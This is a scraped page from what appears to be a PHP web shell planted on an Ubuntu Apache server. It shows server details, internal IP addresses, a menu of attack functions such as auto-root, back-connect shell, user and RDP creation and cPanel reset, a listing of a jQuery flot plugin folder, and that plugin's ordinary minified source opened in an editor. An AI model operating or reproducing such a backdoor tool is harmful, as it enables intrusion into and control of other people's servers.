Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
admins /
vendor /
flot /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-x--x
API.md
53.78
KB
-rwxr-x--x
CONTRIBUTING.md
3.26
KB
-rwxr-x--x
FAQ.md
3.23
KB
-rwxr-x--x
LICENSE.txt
1.07
KB
-rwxr-x--x
Makefile
297
B
-rwxr-x--x
NEWS.md
40.35
KB
-rwxr-x--x
PLUGINS.md
4.38
KB
-rwxr-x--x
README.md
3.8
KB
-rwxr-x--x
excanvas.js
42.35
KB
-rwxr-x--x
excanvas.min.js
18.86
KB
-rwxr-x--x
jquery.colorhelpers.js
6.18
KB
-rwxr-x--x
jquery.colorhelpers.min.js
3.06
KB
-rwxr-x--x
jquery.flot.canvas.js
9.71
KB
-rwxr-x--x
jquery.flot.canvas.min.js
3.87
KB
-rwxr-x--x
jquery.flot.categories.js
6.08
KB
-rwxr-x--x
jquery.flot.categories.min.js
2.54
KB
-rwxr-x--x
jquery.flot.crosshair.js
5.46
KB
-rwxr-x--x
jquery.flot.crosshair.min.js
2.12
KB
-rwxr-x--x
jquery.flot.errorbars.js
12.66
KB
-rwxr-x--x
jquery.flot.errorbars.min.js
5.33
KB
-rwxr-x--x
jquery.flot.fillbetween.js
5.35
KB
-rwxr-x--x
jquery.flot.fillbetween.min.js
2.26
KB
-rwxr-x--x
jquery.flot.image.js
7.42
KB
-rwxr-x--x
jquery.flot.image.min.js
2.63
KB
-rwxr-x--x
jquery.flot.js
123.18
KB
-rwxr-x--x
jquery.flot.min.js
51.73
KB
-rwxr-x--x
jquery.flot.navigate.js
14.22
KB
-rwxr-x--x
jquery.flot.navigate.min.js
6.42
KB
-rwxr-x--x
jquery.flot.pie.js
24.05
KB
-rwxr-x--x
jquery.flot.pie.min.js
11.9
KB
-rwxr-x--x
jquery.flot.resize.js
3.29
KB
-rwxr-x--x
jquery.flot.resize.min.js
2.29
KB
-rwxr-x--x
jquery.flot.selection.js
13.18
KB
-rwxr-x--x
jquery.flot.selection.min.js
5.15
KB
-rwxr-x--x
jquery.flot.stack.js
7.11
KB
-rwxr-x--x
jquery.flot.stack.min.js
2.41
KB
-rwxr-x--x
jquery.flot.symbol.js
2.52
KB
-rwxr-x--x
jquery.flot.symbol.min.js
1.17
KB
-rwxr-x--x
jquery.flot.threshold.js
4.51
KB
-rwxr-x--x
jquery.flot.threshold.min.js
1.8
KB
-rwxr-x--x
jquery.flot.time.js
11.91
KB
-rwxr-x--x
jquery.flot.time.min.js
6.74
KB
-rwxr-x--x
jquery.js
269.07
KB
-rwxr-x--x
jquery.min.js
138.97
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.flot.fillbetween.min.js
/* Javascript plotting library for jQuery, version 0.8.3. Copyright (c) 2007-2014 IOLA and Ole Laursen. Licensed under the MIT license. */ (function($){var options={series:{fillBetween:null}};function init(plot){function findBottomSeries(s,allseries){var i;for(i=0;i<allseries.length;++i){if(allseries[i].id===s.fillBetween){return allseries[i]}}if(typeof s.fillBetween==="number"){if(s.fillBetween<0||s.fillBetween>=allseries.length){return null}return allseries[s.fillBetween]}return null}function computeFillBottoms(plot,s,datapoints){if(s.fillBetween==null){return}var other=findBottomSeries(s,plot.getData());if(!other){return}var ps=datapoints.pointsize,points=datapoints.points,otherps=other.datapoints.pointsize,otherpoints=other.datapoints.points,newpoints=[],px,py,intery,qx,qy,bottom,withlines=s.lines.show,withbottom=ps>2&&datapoints.format[2].y,withsteps=withlines&&s.lines.steps,fromgap=true,i=0,j=0,l,m;while(true){if(i>=points.length){break}l=newpoints.length;if(points[i]==null){for(m=0;m<ps;++m){newpoints.push(points[i+m])}i+=ps}else if(j>=otherpoints.length){if(!withlines){for(m=0;m<ps;++m){newpoints.push(points[i+m])}}i+=ps}else if(otherpoints[j]==null){for(m=0;m<ps;++m){newpoints.push(null)}fromgap=true;j+=otherps}else{px=points[i];py=points[i+1];qx=otherpoints[j];qy=otherpoints[j+1];bottom=0;if(px===qx){for(m=0;m<ps;++m){newpoints.push(points[i+m])}bottom=qy;i+=ps;j+=otherps}else if(px>qx){if(withlines&&i>0&&points[i-ps]!=null){intery=py+(points[i-ps+1]-py)*(qx-px)/(points[i-ps]-px);newpoints.push(qx);newpoints.push(intery);for(m=2;m<ps;++m){newpoints.push(points[i+m])}bottom=qy}j+=otherps}else{if(fromgap&&withlines){i+=ps;continue}for(m=0;m<ps;++m){newpoints.push(points[i+m])}if(withlines&&j>0&&otherpoints[j-otherps]!=null){bottom=qy+(otherpoints[j-otherps+1]-qy)*(px-qx)/(otherpoints[j-otherps]-qx)}i+=ps}fromgap=false;if(l!==newpoints.length&&withbottom){newpoints[l+2]=bottom}}if(withsteps&&l!==newpoints.length&&l>0&&newpoints[l]!==null&&newpoints[l]!==newpoints[l-ps]&&newpoints[l+1]!==newpoints[l-ps+1]){for(m=0;m<ps;++m){newpoints[l+ps+m]=newpoints[l+m]}newpoints[l+1]=newpoints[l-ps+1]}}datapoints.points=newpoints}plot.hooks.processDatapoints.push(computeFillBottoms)}$.plot.plugins.push({init:init,options:options,name:"fillbetween",version:"1.0"})})(jQuery);
Close